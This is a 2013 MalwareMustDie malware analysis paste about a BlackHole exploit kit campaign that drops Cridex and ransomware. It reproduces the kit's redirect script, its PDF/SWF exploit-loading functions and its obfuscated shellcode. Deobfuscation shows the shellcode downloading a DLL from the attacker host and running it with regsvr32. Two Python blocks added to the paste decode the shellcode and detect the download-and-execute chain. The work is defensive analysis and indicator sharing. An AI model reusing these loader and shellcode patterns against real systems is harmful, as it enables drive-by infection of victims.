#MalwareMustDie - ejjiipprr,ru : GeoIP Cridex + Ransomware

MalwareMustDie, Feb 20th, 2013
=========================================================
Title: #MalwareMustDie - ejjiipprr,ru : GeoIP Cridex + Ransomware
#MalwareMustDie! @unixfreaxjp /malware]$ date
Tue Feb 19 15:26:25 JST 2013

BlackHole Exploit Kit with double infector:
Cridex & FakeAV/Ransomer (depends on your request IP)
Landing page: h00p://ejjiipprr,ru:8080/forum/links/public_version,php
IP: 195・210・47・208, 50・31・1・104, 66・249・23・64
payloads:
  2013/02/19  14:07 ff74196d1aacd629ee7af6955c837a24  94,208 readme・exe (cridex)
  2013/02/19  14:06 c182dfc3418573d61fdc7dcc11eb319d 114,688 info・exe (ransomer)
Landing page's PluginDetect:
1: http://pastebin.com/mCJy7GEn
2: http://pastebin.com/LSUCnvN6
=========================================================

//---------changes detected in today's infector・・・

@unixfreaxjp /malware]$ date
Tue Feb 19 14:17:40 JST 2013
@unixfreaxjp /malware]$ curl hxxp://webworks・investorship・co・jp/page-329・htm
<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
 </head>
 <body>
<h1><b>Please wait a moment ・・・ You will be forwarded・・・ </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>


<script>
var1=49;
var2=var1;
if(var1==var2) {document・location="hxxp://ejjiipprr,ru:8080/forum/links/public_version,php";}
</script>


</body>

@unixfreaxjp /malware]$ myget --head -O/dev/null -d hxxp://webworks・investorship・co・jp/page-329・htm
DEBUG output freebsd9・1・
  :
HTTP/1・1 200 OK
Date: Tue, 19 Feb 2013 05:17:54 GMT
Server: Apache
Last-Modified: Tue, 19 Feb 2013 05:06:13 GMT <======

//-----------------download--------

--12:56:52--  h00p://webworks・investorship・co・jp/page-329・htm
           => `page-329・htm'
Resolving webworks・investorship・co・jp・・・ seconds 0・00, 117・20・100・110
Caching webworks・investorship・co・jp => 117・20・100・110
Connecting to webworks・investorship・co・jp|117・20・100・110|:80・・・ seconds 0・00, connected・
  :
GET /page-329・htm HTTP/1・0
Host: webworks・investorship・co・jp
HTTP request sent, awaiting response・・・
  :
HTTP/1・1 200 OK
Date: Tue, 19 Feb 2013 03:56:44 GMT
Server: Apache
Last-Modified: Tue, 19 Feb 2013 03:42:14 GMT
ETag: "11850611-1b1-5122f496"
Accept-Ranges: bytes
Content-Length: 433
Connection: close
Content-Type: text/html
  :
200 OK
Length: 433 [text/html]
12:56:52 (4・99 MB/s) - `page-329・htm' saved [433/433]

//----------------cat-------------------

$ cat page-329・htm
<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
 </head>
 <body>
<h1><b>Please wait a moment ・・・ You will be forwarded・・・ </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>

<script>
var1=49;
var2=var1;
if(var1==var2) {document・location="h00p://ejjiipprr,ru:8080/forum/links/public_version,php";}
</script>

//------------- get the landing page----------------

// can't connect directly, got 502, looks like I got blocked by these moronz now・・

--13:02:20--  h00p://ejjiipprr,ru:8080/forum/links/public_version,php
           => `public_version,php・1'
Resolving ejjiipprr,ru・・・ seconds 0・00, 195・210・47・208, 50・31・1・104, 66・249・23・64
Caching ejjiipprr,ru => 195・210・47・208 50・31・1・104 66・249・23・64
Connecting to ejjiipprr,ru|195・210・47・208|:8080・・・ seconds 0・00, connected・
  :
HTTP/1・1 502 Bad Gateway
Server: nginx/1・0・10
Date: Tue, 19 Feb 2013 04:02:13 GMT
Content-Type: text/html; charset=CP-1251
Connection: keep-alive
X-Powered-By: PHP/5・3・18-1~dotdeb・0
Vary: Accept-Encoding
Content-Length: 0


// retried・・・・・(bouncer)

--13:00:55--  h00p://ejjiipprr,ru:8080/forum/links/public_version,php
           => `public_version,php'
Connecting to myproxy:myport・・・ seconds 0・00, connected・
  :
GET h00p://ejjiipprr,ru:8080/forum/links/public_version,php HTTP/1・0
Referer: h00p://malwaremustdie・org
Host: ejjiipprr,ru:8080
Connection: keep-alive
Proxy request sent, awaiting response・・・
  :
HTTP/1・1 200 OK
Server: nginx/1・0・10
Date: Tue, 19 Feb 2013 04:00:59 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5・3・18-1~dotdeb・0
Vary: Accept-Encoding
  :
200 OK
Length: unspecified [text/html]
13:01:09 (120・01 KB/s) - `public_version,php' saved [156929] <=== take one・・・


// retried・・・(gatling IP gunz・・)


--13:05:53--  h00p://ejjiipprr,ru:8080/forum/links/public_version,php
           => `public_version,php'
Resolving ejjiipprr,ru・・・ 66・249・23・64, 50・31・1・104, 195・210・47・208
Caching ejjiipprr,ru => 66・249・23・64 50・31・1・104 195・210・47・208
Connecting to ejjiipprr,ru|66・249・23・64|:8080・・・ connected・
  :
GET /forum/links/public_version,php HTTP/1・0
      :
Host: ejjiipprr,ru:8080
HTTP request sent, awaiting response・・・
  :
HTTP/1・1 200 OK
Server: nginx/1・0・10
Date: Tue, 19 Feb 2013 04:05:55 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5・3・18-1~dotdeb・0
Vary: Accept-Encoding
  :
200 OK
Length: unspecified [text/html]
13:05:56 (53・84 KB/s) - `public_version,php' saved [36665]


//--------two landing pages------

2013/02/19  13:17  cdb228f7ee3a261d4f3a5d4b723c085a  57,675 public_version-2,php
2013/02/19  13:01  f607dcc1b5a95a284238741f886940ac  56,929 public_version,php

//------1st plugin detect・・・・・


// PDFs・・・・


function p1(){
  var d = document・createElement("object");
  d・setAttribute("data", "/forum/links/public_version,php?edayjh=" + x("de300") + "&mnnq="
   + x("lju") + "&tagwmov=1j:33:32:1l:1g:1i:1o:1n:1o:1i&xllpos=" + x(pdfver・join("・")));
  d・setAttribute("type", "application/pdf");
  document・body・appendChild(d);
}
function p2(){
  var d = document・createElement("object");
  d・setAttribute("data", "/forum/links/public_version,php?lwgbb=" + x("de300") +
  "&lgltly=" + x("r") + "&mlqi=1j:33:32:1l:1g:1i:1o:1n:1o:1i&eshngcjb=" + x(pdfver・join(
  "・")));
  d・setAttribute("type", "application/pdf");
  document・body・appendChild(d);
}

// SWF

function getCN(){
  return "/forum/links/public_version,php?zivqqsfs=" + x("de300") + "&ljpfu=" + x("hsosw")
   + "&ddpp=1j:33:32:1l:1g:1i:1o:1n:1o:1i&benbw=lvkkbwv"
}

function ff2(){
  var oSpan = document・createElement("span");
  var url = "/forum/links/public_version,php?bbbiywar=" + x("de300") + "&wisduk=" + x(
  "toiu") + "&dej=1j:33:32:1l:1g:1i:1o:1n:1o:1i&mkej=fvgwpin";
  oSpan・innerHTML = "
<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id
'><param name='movie' value='" + url + "
' /><param name='allowScriptAccess' value='always' /><param name='Play' value='0' /><embed
 src='" + url + "
' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash
' width='10' height='10'></embed></object>";
  document・body・appendChild(oSpan);
}

// shellcode


function getshellcode(){
  var a = "828・・1414!%"
  ・split("")・reverse()・join("");
  return a["replace"](/\%!/g, "%" + "u")
}


//------ second plugin detect・・・


// PDFs・・・・(none!)

function p1(){
  return false;
}
function p2(){
  return false;
}
function p3(){
  return false;
}

// SWF・・・・

function getCN(){
  return "/forum/links/public_version,php?dxfcb=" + x("50f08") + "&arfxjm=" + x("qfsnn") +
  "&sxclfr=2v:1k:1m:32:33:1k:1k:31:1j:1o&gakchxt=hxekxtdj"
}

function ff2(){
  var oSpan = document・createElement("span");
  var url = "/forum/links/public_version,php?cmfzmg=" + x("50f08") + "&zvdjvx=" + x("pixr"
  ) + "&pxbu=2v:1k:1m:32:33:1k:1k:31:1j:1o&bmobk=jmb";
  oSpan・innerHTML = "
<object classid='clsid:d27cdb6e-ae6d-11cf-96b8-444553540000' width=10 height=10 id='swf_id
'><param name='movie' value='" + url + "
' /><param name='allowScriptAccess' value='always' /><param name='Play' value='0' /><embed
 src='" + url + "
' id='swf_id' name='swf_id' allowScriptAccess='always' type='application/x-shockwave-flash
' width='10' height='10'></embed></object>";
  document・body・appendChild(oSpan);
}

// shellcode・・・・

function getshellcode(){
  var a = "8282・・%1414!%"
  ・split("")・reverse()・join("");
  return a["replace"](/\%!/g, "%" + "u")
}

//-------------------cracks engine・・・・


// let's skip the infector this time・・ we must check whether they changed the
// malware payloads or not・・
//
// ========================================
// get the deobs + crack both shellcodes:
// ========================================


var shellcode1="8282!%51a4!%14d5!%O4eO・・
eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d・・
!%b1a1!%e5a5!%cOc2!%fec6!%f4b5!%a5d4!%・・
36!%e43a!%b25f!%67cO!%673a!%d5ec!%3173・・
O185!%cfbe!%4ecf!%6638!%1414!%1414!%";

var shellcode2="8282!%51f4!%34d5!%54eO・・
eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d・・
!%b1a1!%e5a5!%cOc2!%fec6!%f4b5!%a5d4!%・・
36!%e43a!%b25f!%67cO!%673a!%d5ec!%3173・・
O185!%cfbe!%4ecf!%6638!%1414!%1414!%";


var a = shellcode1・split("")・reverse()・join("");
var xxx=  a["replace"](/\%!/g, "%" + "u");
document・write(xxx);

var b = shellcode2・split("")・reverse()・join("");
var yyy=  b["replace"](/\%!/g, "%" + "u");
document・write("\n\n"+yyy);

//Output:

%u4141%u4141%u8366%ufce4%uebfc%u581O%uc93・・
13%uce5d%ua376%uOc76%uf52b%ua34e%u6324%u6・・
4d5a%u5b4f%u6cef%u2cOc%u5a5e%u1a1b%u6cef%・・
%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e5・・
4O%u5d41%u4a15%u2828

%u4141%u4141%u8366%ufce4%uebfc%u581O%uc93・・
13%uce5d%ua376%uOc76%uf52b%ua34e%u6324%u6・・
4d5a%u5b4f%u6cef%u2cOc%u5a5e%u1a1b%u6cef%・・
%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e5・・
45%u5d43%u4f15%u2828

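The same deobfuscation as the cracking script above, as an added Python example (not the paste's own code): it reverses the blob, restores the "%u" escapes that the kit stored as "!%", and then converts the escapes into the little-endian bytes the exploit would place in memory. The input is the tail of shellcode1 exactly as it is visible on the page; the sled counter assumes 0x41 as the filler byte.

```python
import re

# The visible tail of shellcode1 from the paste above (the rest of the blob is
# elided on the page, so only this fragment is decoded here).
SAMPLE_ENCODED = "cfbe!%4ecf!%6638!%1414!%1414!%"


def deobfuscate(encoded: str) -> str:
    """Undo the landing page's trick: the %u-escaped shellcode was stored
    reversed with every 'u' swapped for '!', so reverse it and put 'u' back."""
    return encoded[::-1].replace("%!", "%u")


_ESCAPE = re.compile(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})")


def unescape_to_bytes(escaped: str) -> bytes:
    """Turn JS unescape()-style text into the bytes the exploit lays out in
    memory: %uXXXX is a 16-bit code unit stored little-endian (UTF-16LE),
    %XX is one byte, and anything else is copied through as Latin-1."""
    out = bytearray()
    pos = 0
    for m in _ESCAPE.finditer(escaped):
        out += escaped[pos:m.start()].encode("latin-1")
        if m.group(1) is not None:
            out += int(m.group(1), 16).to_bytes(2, "little")
        else:
            out.append(int(m.group(2), 16))
        pos = m.end()
    out += escaped[pos:].encode("latin-1")
    return bytes(out)


def decode_shellcode(encoded: str) -> bytes:
    """Full pipeline: reversed '!%' blob -> %u text -> raw bytes."""
    return unescape_to_bytes(deobfuscate(encoded))


def sled_length(code: bytes, filler: int = 0x41) -> int:
    """Count the leading filler bytes ('A' = inc ecx on x86) before real code."""
    n = 0
    while n < len(code) and code[n] == filler:
        n += 1
    return n


if __name__ == "__main__":
    code = decode_shellcode(SAMPLE_ENCODED)
    print(deobfuscate(SAMPLE_ENCODED))   # %u4141%u4141%u8366%ufce4%uebfc
    print(code.hex())                    # 414141416683e4fcfceb
    print("sled bytes:", sled_length(code))
```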
// let's mix the shellcodes now ;-))) experimental!

// I doubt there will be an ASCII URL, so・・・
// compile it・・・ get the objects, disasm them and match against the Windows API, to see whether this double scheme works or not・・・

0x7c801ad9 kernel32・VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32・LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32・GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon・URLDownloadToFileA(pCaller=0, szURL=h00p://ejjiipprr,ru:8080/forum/links/public_version,php?xf=1k:1f:33:1f:1n&ne=2v:1k:1m:32:33:1k:1k:31:1j:1o&f=1k&df=m&ku=g, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll)
0x7c86250d kernel32・WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
0x7c86250d kernel32・WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
0x7c81cb3b kernel32・TerminateThread(dwExitCode=0)
0x7c801ad9 kernel32・VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32・LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32・GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon・URLDownloadToFileA(pCaller=0, szURL=h00p://ejjiipprr,ru:8080/forum/links/public_version,php?kf=31:32:1i:1f:1f&ie=1j:33:32:1l:1g:1i:1o:1n:1o:1i&l=1k&xu=h&iu=b, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll)
0x7c86250d kernel32・WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
0x7c86250d kernel32・WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0・dll, uCmdShow=0)
0x7c81cb3b kernel32・TerminateThread(dwExitCode=0)

// it works :-)) good!

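A detection-side reading of the API trace above, as an added Python example (not the paste's or the sandbox's code): it parses hook-log lines of that shape and flags a file fetched with URLDownloadToFileA that is then handed to WinExec, either directly or through "regsvr32 -s", noting whether the drop lives under Temp. The trace lines are constructed in the same shape as the page's; the URL and the DLL name are placeholders.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in the shape of the API hook trace above; the URL and the
# dropped file name are placeholders, not values taken from the page.
SAMPLE_TRACE = [
    "0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)",
    "0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)",
    "0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, "
    "[lpBuffer=C:\\DOCUME~1\\Administrator\\LOCALS~1\\Temp\\])",
    "0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=hxxp://landing.example"
    "/forum/links/public_version.php?x=1, lpfnCB=0x0, "
    "szFileName=C:\\DOCUME~1\\Administrator\\LOCALS~1\\Temp\\dropped.dll)",
    "0x7c86250d kernel32.WinExec(lpCmdLine=C:\\DOCUME~1\\Administrator\\LOCALS~1"
    "\\Temp\\dropped.dll, uCmdShow=0)",
    "0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\\DOCUME~1\\Administrator"
    "\\LOCALS~1\\Temp\\dropped.dll, uCmdShow=0)",
    "0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)",
]

_CALL = re.compile(r"^(0x[0-9a-fA-F]+)\s+(\w+)\.(\w+)\((.*)\)$")
# key=value pairs; a value runs until the next ", key=" (or ", [key=" for the
# bracketed output values the hook log prints once a call has returned).
_ARG = re.compile(r"(\w+)=((?:(?!, \[?\w+=).)*)")


def parse_call(line: str) -> Tuple[str, str, Dict[str, str]]:
    """Split one hook-log line into (module, api, args). A bracketed output
    value overwrites the input value of the same name, e.g. GetTempPathA's buffer."""
    m = _CALL.match(line.strip())
    if not m:
        raise ValueError("not a hook line: " + line)
    args = {k: v.strip("[]") for k, v in _ARG.findall(m.group(4))}
    return m.group(2), m.group(3), args


def find_download_and_execute(lines: List[str]) -> List[Dict[str, object]]:
    """Flag the download-and-execute chain: a path written by URLDownloadToFileA
    that is later passed to an exec API, either directly or via 'regsvr32 -s'
    (silent DLL registration), and record whether the drop sits under Temp."""
    downloaded: Dict[str, str] = {}          # lower-cased path -> source URL
    findings: List[Dict[str, object]] = []
    for _module, api, a in (parse_call(l) for l in lines if l.strip()):
        if api == "URLDownloadToFileA":
            downloaded[a["szFileName"].lower()] = a["szURL"]
        elif api in ("WinExec", "CreateProcessA", "ShellExecuteA"):
            cmd = (a.get("lpCmdLine") or a.get("lpCommandLine") or a.get("lpFile", "")).lower()
            for path, url in downloaded.items():
                if path in cmd:
                    rule = "regsvr32-silent-load" if cmd.startswith("regsvr32 -s") \
                        else "exec-downloaded-file"
                    findings.append({"rule": rule, "path": path, "url": url,
                                     "in_temp": "\\temp\\" in path})
    return findings


if __name__ == "__main__":
    for hit in find_download_and_execute(SAMPLE_TRACE):
        print(hit["rule"], hit["path"], "from", hit["url"])
```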
// fetch the mess・・・

--14:07:23--  h00p://ejjiipprr,ru:8080/forum/links/public_version,php?xf=1k:1f:33:1f:1n&ne=2v:1k:1m:32:33:1k:1k:31:1j:1o&f=1k&df=m&ku=g
           => `public_version,php@xf=1k%3A1f%3A33%3A1f%3A1n&ne=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&f=1k&df=m&ku=g'
Resolving ejjiipprr,ru・・・ seconds 0・00, 50・31・1・104, 66・249・23・64, 195・210・47・208
Caching ejjiipprr,ru => 50・31・1・104 66・249・23・64 195・210・47・208
Connecting to ejjiipprr,ru|50・31・1・104|:8080・・・ seconds 0・00, connected・
  :
GET /forum/links/public_version,php?xf=1k:1f:33:1f:1n&ne=2v:1k:1m:32:33:1k:1k:31:1j:1o&f=1k&df=m&ku=g HTTP/1・0
Referer: h00p://malwaremustdie・org
User-Agent: #Smash greedy malware moronz!
Host: ejjiipprr,ru:8080
HTTP request sent, awaiting response・・・
  :
HTTP/1・1 200 OK
Server: nginx/1・0・10
Date: Tue, 19 Feb 2013 05:07:16 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5・3・18-1~dotdeb・0
Pragma: public
Expires: Tue, 19 Feb 2013 05:07:16 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="readme・exe"
Content-Transfer-Encoding: binary
Content-Length: 94208
  :
200 OK
Length: 94,208 (92K) [application/x-msdownload]
100%[====================================>] 94,208        98・81K/s
14:07:25 (98・48 KB/s) - `public_version,php@xf=1k%3A1f%3A33%3A1f%3A1n&ne=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&f=1k&df=m&ku=g' saved [94208/94208]
  :
GET /forum/links/public_version,php?kf=31:32:1i:1f:1f&ie=1j:33:32:1l:1g:1i:1o:1n:1o:1i&l=1k&xu=h&iu=b HTTP/1・0
Referer: h00p://malwaremustdie・org
User-Agent: #Smash greedy malware moronz!
Host: ejjiipprr,ru:8080
HTTP request sent, awaiting response・・・
  :
HTTP/1・1 200 OK
Server: nginx/1・0・10
Date: Tue, 19 Feb 2013 05:06:40 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5・3・18-1~dotdeb・0
Pragma: public
Expires: Tue, 19 Feb 2013 05:06:40 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="info・exe"
Content-Transfer-Encoding: binary
Content-Length: 114688
  :
200 OK
Length: 114,688 (112K) [application/x-msdownload]
100%[====================================>] 114,688      107・17K/s
14:06:50 (106・95 KB/s) - `public_version,php@kf=31%3A32%3A1i%3A1f%3A1f&ie=1j%3A33%3A32%3A1l%3A1g%3A1i%3A1o%3A1n%3A1o%3A1i&l=1k&xu=h&iu=b' saved [114688/114688]


// samples evidence・・・

info・exe    c182dfc3418573d61fdc7dcc11eb319d
readme・exe  ff74196d1aacd629ee7af6955c837a24

// you can see the snapshot of the downloaded binaries here・・・
// the smaller one is Cridex and the bigger one is Ransomer/FakeAlert

http://urlquery・net/report・php?id=1039316
http://urlquery・net/report・php?id=1039314

// or the VT checks here・・・

https://www・virustotal・com/en/file/3cb0a852b902c1beffa70e6405825dfe71ad28141f8bcc369880af9f7e692b84/analysis/1361252424/
https://www・virustotal・com/en/file/6cd8ae852bd023982b292a714d3e1582537606cc655a74c1fef152742c215e00/analysis/1361252413/

// and Anubis for your convenience:

http://anubis・iseclab・org/?action=result&task_id=1ab45db359838bee4dd1cfc29c34675ef
http://anubis・iseclab・org/?action=result&task_id=148f40a21af53f524693c43eb52b6da6e



// ================================
//      NETWORK ANALYSIS
//==================================


// IP:

ejjiipprr,ru:8080 46,175,224,21 - 195,210,47,208 - 50,31,1,104 - 66,249,23,64

         A      195・210・47・208, 50・31・1・104, 66・249・23・64


// SOA:

primary name server = ns1・ejjiipprr,ru
responsible mail addr = root・ejjiipprr,ru
serial  = 2012010101
refresh = 604800 (7 days)
retry   = 1800 (30 mins)
expire  = 1800 (30 mins)
default TTL = 60 (1 min)

// evil ns lists:

ns1・ejjiipprr,ru・       1038    IN      A       41・168・5・140
ns2・ejjiipprr,ru・       1038    IN      A       110・164・58・250
ns3・ejjiipprr,ru・       1038    IN      A       210・71・250・131
ns4・ejjiipprr,ru・       1038    IN      A       203・171・234・53
ns5・ejjiipprr,ru・       60      IN      A       110・164・58・250
ns6・ejjiipprr,ru・       60      IN      A       41・168・5・140

// Whois:
domain:        EJJIIPPRR,ru
nserver:       ns1・ejjiipprr,ru・ 41・168・5・140
nserver:       ns2・ejjiipprr,ru・ 110・164・58・250
nserver:       ns3・ejjiipprr,ru・ 210・71・250・131
nserver:       ns4・ejjiipprr,ru・ 203・171・234・53
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     NAUNET-REG-RIPN
admin-contact: https://client・naunet,ru/c/whoiscontact
created:       2013・02・11
paid-till:     2014・02・11
free-date:     2014・03・14
source:        TCI

// Domains recently used by the current malware moronz group (historical records),
// to be used as reference:

// all are using the same evil DNS (the ns1-ns6 addresses listed above)


------
#MalwareMustDie!